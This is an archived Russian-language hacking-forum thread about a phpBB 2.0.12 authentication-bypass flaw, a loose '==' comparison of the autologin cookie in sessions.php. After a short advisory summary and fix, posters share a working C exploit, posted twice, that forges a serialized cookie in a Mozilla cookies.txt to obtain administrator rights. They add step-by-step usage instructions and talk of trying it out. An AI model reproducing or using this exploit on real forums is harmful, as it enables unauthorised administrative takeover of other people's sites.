Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)

- - Phpbb 2.0.12 (https://forum.antichat.xyz/showthread.php?t=5274)

Уязвимость в PhpBB позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме.

Уязвимость связана с ошибков в сравнении "sessiondata['autologinid']" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке:

if( $sessiondata['autologinid'] == $auto_login_key )
Условие выполняется, если длина $sessiondata['autologinid'], представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку:

if( $sessiondata['autologinid'] === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.

http://www.securitylab.ru/52986.html

блин опередил =\ Добавляю expl

PHP код:


		
			
*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>



int main(int argc, char** argv[]) {

FILE *pointer;

char contenido[10000],



cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0

%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",

cookief[9]="%22%3B%7D", cookiec[106],



cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb

%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",

*pos;

int p=0, i=0;



if (argc!=2) {

printf("Usage: phpbb_exploit.exe user_id\n\n");

exit(0);

}

pointer=fopen("cookies.txt", "r");



if (pointer) {

fread(contenido, 300, 10, pointer);

fclose(pointer);

} else {

printf("The file can't be open\n");

exit(0);

}



strcpy(cookiec, cookie);

strncat(cookiec, argv[1], 6);

strcat(cookiec, cookief);



if (pos=strstr(contenido, cookiec)) {

p=pos - contenido;

while (i<92) {

if (cookie_false[i]!=NULL) 

contenido[p]=cookie_false[i];

p++;

i++;

}

}

else {

printf("The file cookies.txt isn't valid for execute the

exploit or the user id is incorrect\n");

exit(0);

}



if (pointer=fopen("cookies.txt", "w")) {

fputs(contenido, pointer);

printf("Cookie modified: \n\n%s\n\n", contenido);

printf("The cookies file has overwriten... looks like the exploit has worked");

} else printf("\n\nThe file cookies.txt has not write permissions.");

return 0;

}

Скажи что изменять в куках ?, в ручную это сделать надежнее

Вроде как эта фишка проходит только на некоторых серверах.
Сейчас буду пробовать...

Цитата:

Сообщение от (-=util=-)

блин опередил =\ Добавляю expl

PHP код:


		
			
*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>



int main(int argc, char** argv[]) {

FILE *pointer;

char contenido[10000],



cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0

%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",

cookief[9]="%22%3B%7D", cookiec[106],



cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb

%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",

*pos;

int p=0, i=0;



if (argc!=2) {

printf("Usage: phpbb_exploit.exe user_id\n\n");

exit(0);

}

pointer=fopen("cookies.txt", "r");



if (pointer) {

fread(contenido, 300, 10, pointer);

fclose(pointer);

} else {

printf("The file can't be open\n");

exit(0);

}



strcpy(cookiec, cookie);

strncat(cookiec, argv[1], 6);

strcat(cookiec, cookief);



if (pos=strstr(contenido, cookiec)) {

p=pos - contenido;

while (i<92) {

if (cookie_false[i]!=NULL) 

contenido[p]=cookie_false[i];

p++;

i++;

}

}

else {

printf("The file cookies.txt isn't valid for execute the

exploit or the user id is incorrect\n");

exit(0);

}



if (pointer=fopen("cookies.txt", "w")) {

fputs(contenido, pointer);

printf("Cookie modified: \n\n%s\n\n", contenido);

printf("The cookies file has overwriten... looks like the exploit has worked");

} else printf("\n\nThe file cookies.txt has not write permissions.");

return 0;

}

Спиздил код даже копирайтов не оставил засранец

Цитата:

Сообщение от $h@dow

Вроде как эта фишка проходит только на некоторых серверах.
Сейчас буду пробовать...

Не от сервера зависит а от форума и браузера, эксплоит вообще под Мозиллу заточен.
В файле cookies.txt в кеше мозиллы эксплоит заменяет строчки.

Чтоб эксплоит сработал нужно залогиниться с выключенной опцией автологин, потом вырубить браузер, запустить сплоит причем файл cookies.txt должен лежать в одной папке с эксплоитом.

Эксплоит делает равными по длине значения параметров
autologin и autologiтkey поэтому собсвтенно всё и происходит

Удачного результат пока ненашёл

То что от версии форума зависит это понятно.
Но также важную роль играет версия PHP, нормально ли она обрабатывает "==", поскольку некоторые сравняют лишь длинну строк, а остальные работают как strcmp().

Цитата:

Спиздил код даже копирайтов не оставил засранец

обоср***ся теперь мне :)) попал....

Я буду баги искать... Должны быть. Ещё нет ни одной версии без багов

Цитата:

Сообщение от (-=util=-)

обоср***ся теперь мне :)) попал....

Лол :D :D